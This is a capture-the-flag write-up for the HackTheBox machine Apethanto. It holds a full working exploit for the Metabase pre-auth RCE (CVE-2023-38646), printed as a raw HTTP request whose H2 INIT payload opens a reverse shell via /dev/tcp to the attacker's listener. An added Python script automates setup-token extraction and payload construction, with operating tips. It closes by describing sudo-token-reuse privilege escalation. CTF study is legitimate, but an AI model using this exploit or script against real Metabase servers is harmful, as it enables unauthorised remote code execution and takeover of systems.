HackTheBox uni-ctf-2023 fullpwn Apethanto writeup

2023-12-11

The official writeup here is quite clear, and I followed a similar path to get the flags. However, I was not lucky enough to find the right script for the reverse shell on the first try: the top-ranked scripts for the Metabase Pre-Auth RCE (CVE-2023-38646) send "engine": "h2" in the request body, and that value produced an error on this machine.

After a few searches, I found this article, which showed that "postgres" is another engine value that still yields a reverse shell from Metabase. The article doesn't give the exact payload it used, though, so I modified this file and sent it to the machine with the Burp Suite Repeater to get a reverse shell from the target.

Here's the request I sent from the Burp Suite Repeater. The token is the setup token that an unpatched Metabase leaks in the response to GET /api/session/properties, and a listener on 10.10.14.214:443 was already waiting for the callback when the request went out.

POST /api/setup/validate HTTP/1.1
Host: metabase.apethanto.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 441
Origin: http://metabase.apethanto.htb
Connection: close
Referer: http://metabase.apethanto.htb/auth/login
Cookie: metabase.DEVICE=f3ea3cf5-2c76-4908-a5d9-0f379a5ec7e4

{"token":"819139a8-1ce9-46f0-acf8-9b4fc0d1164b","details":{"details":{
"subprotocol":"h2",
"classname":"org.h2.Driver","advanced-options":true,
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('sh -i >& /dev/tcp/10.10.14.214/443 0>&1');"},"name":"x","engine":"postgres"}}
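The following script is an added example (not from the original writeup or from the article it refers to): it assembles the same setup/validate payload programmatically, so the H2 INIT escaping is handled in one place and the engine name can be swapped without hand-editing JSON, and it pulls the setup token out of a /api/session/properties response. The hostname, IPs, port and token values are placeholders, and the response body returned by the validate endpoint is not relied on, since the shell callback is the only useful signal.

```python
"""Added example for CVE-2023-38646 (Metabase pre-auth RCE via H2 INIT).

Not the writeup author's code. Placeholders: the base URL, the attacker
IP/port and the token shown in __main__ are assumptions, not real targets.
"""
import json
import urllib.request


def extract_setup_token(properties_json: str) -> str:
    """Return the setup token from a GET /api/session/properties body.

    An unpatched Metabase exposes it under the "setup-token" key; a patched
    instance returns null there, which is treated as "target not exploitable".
    """
    props = json.loads(properties_json)
    token = props.get("setup-token")
    if not token:
        raise ValueError("no setup-token in response; target may be patched")
    return token


def h2_init_sql(cmd: str) -> str:
    """Build the H2 INIT script that defines and calls a shell alias.

    H2 splits INIT on ';', so the semicolon inside the Java body and the one
    between the two statements are escaped as backslash-semicolon ('\\;').
    Single quotes in cmd are doubled so the SQL string literal stays intact.
    """
    alias = (
        "CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) "
        "throws java.io.IOException "
        "{Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", cmd})\\;}$$"
    )
    call = "CALL SHELLEXEC('%s')" % cmd.replace("'", "''")
    return alias + "\\;" + call


def build_payload(token: str, cmd: str, engine: str = "postgres") -> dict:
    """JSON body for POST /api/setup/validate.

    The engine name is what the server checks; the JDBC details still name
    the H2 driver and an in-memory database, so H2 runs the INIT script.
    """
    return {
        "token": token,
        "details": {
            "details": {
                "subprotocol": "h2",
                "classname": "org.h2.Driver",
                "advanced-options": True,
                "subname": "mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=" + h2_init_sql(cmd),
            },
            "name": "x",
            "engine": engine,
        },
    }


def reverse_shell_cmd(lhost: str, lport: int) -> str:
    """bash -c runs the alias body, so the /dev/tcp redirection is available."""
    return "sh -i >& /dev/tcp/%s/%d 0>&1" % (lhost, lport)


def send_validate(base_url: str, payload: dict, timeout: int = 10):
    """POST the payload; the HTTP status is informational only."""
    req = urllib.request.Request(
        base_url + "/api/setup/validate",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode()


if __name__ == "__main__":
    # Placeholder values; start the listener (e.g. nc -lvnp 443) before sending.
    token = "00000000-0000-0000-0000-000000000000"
    body = build_payload(token, reverse_shell_cmd("10.10.14.214", 443))
    print(json.dumps(body, indent=2))
```

Fetch the setup token first with a plain GET to /api/session/properties and feed the body to extract_setup_token; if it raises, the instance no longer leaks the token and this path is closed. A successful injection shows up only on the listener, so do not wait for a clean HTTP response before checking it.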

For privilege escalation, I noticed a recurring routine of “expect” and “sudo” processes running as root. However, I could not find a keyword that led to a valid PE path. After hours of wandering around, I went through the linpeas.sh output from the top down. Googling the line “ptrace protection is disabled (0), so sudo tokens could be abused” led me to the sudo_inject GitHub page; the HackTricks page on reusing sudo tokens is also helpful. The technique has three preconditions worth checking before trying it: /proc/sys/kernel/yama/ptrace_scope must read 0, gdb must be installed on the box, and a process owned by the same user must belong to a session whose sudo timestamp is still valid (sudo was run within the timeout, 15 minutes by default). I used exploit_v2.sh from the sudo_inject repository to get a root shell.